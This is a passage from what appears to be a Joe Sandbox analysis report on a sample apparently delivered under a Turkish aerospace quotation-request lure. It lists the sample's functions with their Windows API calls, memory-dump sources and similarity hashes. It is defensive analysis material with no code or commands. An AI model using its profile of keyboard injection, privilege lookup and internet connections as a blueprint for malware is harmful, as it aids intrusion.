                                                                                                                                    • Instruction Fuzzy Hash: CE413979600611DFCB11EF14C484A5EBBE1EF4A310F598098EC8A9B362CB78FD01DB91
                                                                                                                                    APIs
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 010288DE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InvalidateRect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 634782764-0
                                                                                                                                    • Opcode ID: fb6d6e42037d7585d108dc53f86f6ae6472b00a4f582413ce3d7a6f80a9042fb
                                                                                                                                    • Instruction ID: af9b092e59382c41a020751ee352e0a067b55666af03f51e2657114ad043bed4
                                                                                                                                    • Opcode Fuzzy Hash: fb6d6e42037d7585d108dc53f86f6ae6472b00a4f582413ce3d7a6f80a9042fb
                                                                                                                                    • Instruction Fuzzy Hash: 7031E13C700129BEEB719E68DC44BAC7BE5EB0A350F588143FAD1E61A1C67595408B52
                                                                                                                                    APIs
                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0102AB60
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0102ABD6
                                                                                                                                    • PtInRect.USER32(?,?,0102C014), ref: 0102ABE6
                                                                                                                                    • MessageBeep.USER32(00000000), ref: 0102AC57
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1352109105-0
                                                                                                                                    • Opcode ID: 371df91ee05abf8eb191e48e6c958738b8402a733ead1c002a383e435fbaf6ab
                                                                                                                                    • Instruction ID: 0ad00a57d7021eee7b3ae802ecace40512317ed5a24c9bf7e3677f94b0c0fa4c
                                                                                                                                    • Opcode Fuzzy Hash: 371df91ee05abf8eb191e48e6c958738b8402a733ead1c002a383e435fbaf6ab
                                                                                                                                    • Instruction Fuzzy Hash: 6441B130700129DFCB22CF58C884BA9BBF5FF88750F2484A9E9949F655CB31E841CB90
                                                                                                                                    APIs
                                                                                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 01000B27
                                                                                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 01000B43
                                                                                                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 01000BA9
                                                                                                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 01000BFB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                    • Opcode ID: c3d5677d1437927bfbd520174d34b9a7c57e03a58e8045e67f232e9a19a49063
                                                                                                                                    • Instruction ID: 6f8eab147665d3ad018cb6e6cc2d3a5e7b2f9dafa5bc3adba9d6d5814e443391
                                                                                                                                    • Opcode Fuzzy Hash: c3d5677d1437927bfbd520174d34b9a7c57e03a58e8045e67f232e9a19a49063
                                                                                                                                    • Instruction Fuzzy Hash: B5314830E44A18AEFB338E2D8C05BFEBBE5AF45394F08439AF6C1521D9C3B985449751
                                                                                                                                    APIs
                                                                                                                                    • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 01000C66
                                                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 01000C82
                                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 01000CE1
                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 01000D33
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                    • Opcode ID: bf28746bb2148bbcc1d5234c529601c83434a65179ec8be9b95626d6b4abfe98
                                                                                                                                    • Instruction ID: 9978a57d852dea6097c1082b9447465264bec6b29fe97bc91151494036d80b6a
                                                                                                                                    • Opcode Fuzzy Hash: bf28746bb2148bbcc1d5234c529601c83434a65179ec8be9b95626d6b4abfe98
                                                                                                                                    • Instruction Fuzzy Hash: 5E31353090031C6EFF368B28C818BFEBBA6AF45350F04439BF5C1521D9C379954587A2
                                                                                                                                    APIs
                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00FD61FB
                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 00FD6229
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FD6257
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FD628D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3058430110-0
                                                                                                                                    • Opcode ID: 85eeef74336b30b112b17685d9bb219faa29d2a50cd205f61fe59ffd9fda4a16
                                                                                                                                    • Instruction ID: eb655e4eb92fa0893275b34a19ba85d4fc97ab3e5fcac78988f30f6f1ba3d689
                                                                                                                                    • Opcode Fuzzy Hash: 85eeef74336b30b112b17685d9bb219faa29d2a50cd205f61fe59ffd9fda4a16
                                                                                                                                    • Instruction Fuzzy Hash: 7931E131A00246AFDF218F64CC45BBA7BBAFF42761F19402AF864D7291D731D950EB90
                                                                                                                                    APIs
                                                                                                                                    • GetForegroundWindow.USER32 ref: 01024F02
                                                                                                                                      • Part of subcall function 01003641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0100365B
                                                                                                                                      • Part of subcall function 01003641: GetCurrentThreadId.KERNEL32 ref: 01003662
                                                                                                                                      • Part of subcall function 01003641: AttachThreadInput.USER32(00000000,?,01005005), ref: 01003669
                                                                                                                                    • GetCaretPos.USER32(?), ref: 01024F13
                                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 01024F4E
                                                                                                                                    • GetForegroundWindow.USER32 ref: 01024F54
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2759813231-0
                                                                                                                                    • Opcode ID: 8bfe4f71ba5b4a3cb7bcf9a44daa0756dd9f3a4bb6907e0d095e1e5cda2e5485
                                                                                                                                    • Instruction ID: 98f26d07a881fa05944991c020eaf701ecea21befdfa60737c48f09ca721c415
                                                                                                                                    • Opcode Fuzzy Hash: 8bfe4f71ba5b4a3cb7bcf9a44daa0756dd9f3a4bb6907e0d095e1e5cda2e5485
                                                                                                                                    • Instruction Fuzzy Hash: FE310DB1D00109AFDB10EFA5CC859EFB7F9EF99300F10406AE555E7241DAB99E458BA0
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                                                                                    • GetCursorPos.USER32(?), ref: 0102C4D2
                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00FDB9AB,?,?,?,?,?), ref: 0102C4E7
                                                                                                                                    • GetCursorPos.USER32(?), ref: 0102C534
                                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00FDB9AB,?,?,?), ref: 0102C56E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2864067406-0
                                                                                                                                    • Opcode ID: e8aa62b5655f1838bf9bb270be98b5c20a090aeac03ea569afd2d1aef1b807da
                                                                                                                                    • Instruction ID: 1527163b5c37cf381370a52c172083962b88559186bfd1214030abbb455fe2d1
                                                                                                                                    • Opcode Fuzzy Hash: e8aa62b5655f1838bf9bb270be98b5c20a090aeac03ea569afd2d1aef1b807da
                                                                                                                                    • Instruction Fuzzy Hash: 8F31C135600038AFEB65CF5CC858EAE7FF5EB09390F444099FA858B261CB359990DBA4
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FF810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FF8121
                                                                                                                                      • Part of subcall function 00FF810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FF812B
                                                                                                                                      • Part of subcall function 00FF810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF813A
                                                                                                                                      • Part of subcall function 00FF810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF8141
                                                                                                                                      • Part of subcall function 00FF810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF8157
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00FF86A3
                                                                                                                                    • _memcmp.LIBCMT ref: 00FF86C6
                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FF86FC
                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00FF8703
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1592001646-0
                                                                                                                                    • Opcode ID: 767e2bd48431ce061db6095f431b4ef31059272e84a820cdd74c52883f4c45b5
                                                                                                                                    • Instruction ID: bc3408d7cc8cce69c82f8ba8f7eb3c00bdc3dc1649b0b5bee5f5efc22c08387c
                                                                                                                                    • Opcode Fuzzy Hash: 767e2bd48431ce061db6095f431b4ef31059272e84a820cdd74c52883f4c45b5
                                                                                                                                    • Instruction Fuzzy Hash: 96216972E0010DEBDB10DFA4CA49BFEB7B8EF45394F154059E544AB250EB35AE06EB90
                                                                                                                                    APIs
                                                                                                                                    • __setmode.LIBCMT ref: 00FC09AE
                                                                                                                                      • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01007896,?,?,00000000), ref: 00FA5A2C
                                                                                                                                      • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01007896,?,?,00000000,?,?), ref: 00FA5A50
                                                                                                                                    • _fprintf.LIBCMT ref: 00FC09E5
                                                                                                                                    • OutputDebugStringW.KERNEL32(?), ref: 00FF5DBB
                                                                                                                                      • Part of subcall function 00FC4AAA: _flsall.LIBCMT ref: 00FC4AC3
                                                                                                                                    • __setmode.LIBCMT ref: 00FC0A1A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 521402451-0
                                                                                                                                    • Opcode ID: 6719359f6138ba435c7e99f6cd745d0ff89dbf588b120b9ac9415733b89bd530
                                                                                                                                    • Instruction ID: 169806085914589823341841466f748e417b257795081fc396db12ed21d50a36
                                                                                                                                    • Opcode Fuzzy Hash: 6719359f6138ba435c7e99f6cd745d0ff89dbf588b120b9ac9415733b89bd530
                                                                                                                                    • Instruction Fuzzy Hash: 42112772908206AFDB04B6B49C47FFEB768AF46320F14005DF205561C2EE7D5C4677A5
                                                                                                                                    APIs
                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 010117A3
                                                                                                                                      • Part of subcall function 0101182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0101184C
                                                                                                                                      • Part of subcall function 0101182D: InternetCloseHandle.WININET(00000000), ref: 010118E9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1463438336-0
                                                                                                                                    • Opcode ID: 11c8a45c3219f50e2c4da7cc002fdf87a1cb62ca3a4c221035f356077795f919
                                                                                                                                    • Instruction ID: b2b22fbeb5c3166912632b1d052602e2bb07c7c17812065b83d4bccc10631744
                                                                                                                                    • Opcode Fuzzy Hash: 11c8a45c3219f50e2c4da7cc002fdf87a1cb62ca3a4c221035f356077795f919
                                                                                                                                    • Instruction Fuzzy Hash: 70219231200606BFEB269F74DC00FBABBF9FF48710F10401AFB9196654DB79941197A0
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesW.KERNEL32(?,0102FAC0), ref: 01003A64
                                                                                                                                    • GetLastError.KERNEL32 ref: 01003A73
                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 01003A82
                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0102FAC0), ref: 01003ADF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2267087916-0
                                                                                                                                    • Opcode ID: 6b74f7110fc17020b38423d83ebba1d4fde87ccba3d1043f35e7eb3688e1831a
                                                                                                                                    • Instruction ID: 26eae621515b8783b53977de38b428d11eca7d22e65b7aa99763aa7cb00bfd57
                                                                                                                                    • Opcode Fuzzy Hash: 6b74f7110fc17020b38423d83ebba1d4fde87ccba3d1043f35e7eb3688e1831a
                                                                                                                                    • Instruction Fuzzy Hash: 2F2171745082029F9712EF28C88186B7BE4BE5B764F104A5EF4D9CB2D1DB31D949CB92
                                                                                                                                    APIs
                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 01025D80
                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 01025D9A
                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 01025DA8
                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 01025DB6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2169480361-0
                                                                                                                                    • Opcode ID: 2b847fb8da10c75cc1031ca5c3ae4fdead74065719449a0d9da7797b4666b92e
                                                                                                                                    • Instruction ID: 50c987423a52976d7fda6dab83dd88afc5b29b65b8702b3ca92c5074ff85daa0
                                                                                                                                    • Opcode Fuzzy Hash: 2b847fb8da10c75cc1031ca5c3ae4fdead74065719449a0d9da7797b4666b92e
                                                                                                                                    • Instruction Fuzzy Hash: D811D631205121AFDB24AF14DC08FBF77A9EF86360F144218F956D72E2C7A8AD01C754
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FFF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00FFDCD3,?,?,?,00FFEAC6,00000000,000000EF,00000119,?,?), ref: 00FFF0CB
                                                                                                                                      • Part of subcall function 00FFF0BC: lstrcpyW.KERNEL32(00000000,?,?,00FFDCD3,?,?,?,00FFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FFF0F1
                                                                                                                                      • Part of subcall function 00FFF0BC: lstrcmpiW.KERNEL32(00000000,?,00FFDCD3,?,?,?,00FFEAC6,00000000,000000EF,00000119,?,?), ref: 00FFF122
                                                                                                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00FFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FFDCEC
                                                                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,00FFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FFDD12
                                                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00FFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FFDD46
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                    • String ID: cdecl
                                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                                    • Opcode ID: 26f85fb3b3298914a1fe3e4397fab80825741640527ddbbf1f02081e60b5bdf3
                                                                                                                                    • Instruction ID: 19aa0581980c7020100804d8809b487f170e22db0ad8a8b845f7943b10c152e3
                                                                                                                                    • Opcode Fuzzy Hash: 26f85fb3b3298914a1fe3e4397fab80825741640527ddbbf1f02081e60b5bdf3
                                                                                                                                    • Instruction Fuzzy Hash: 9C11B13A200309EBCB259F34C845D7E77A9FF45350B50802AFA06CB260EB759841E790
                                                                                                                                    APIs
                                                                                                                                    • _free.LIBCMT ref: 00FD5101
                                                                                                                                      • Part of subcall function 00FC571C: __FF_MSGBANNER.LIBCMT ref: 00FC5733
                                                                                                                                      • Part of subcall function 00FC571C: __NMSG_WRITE.LIBCMT ref: 00FC573A
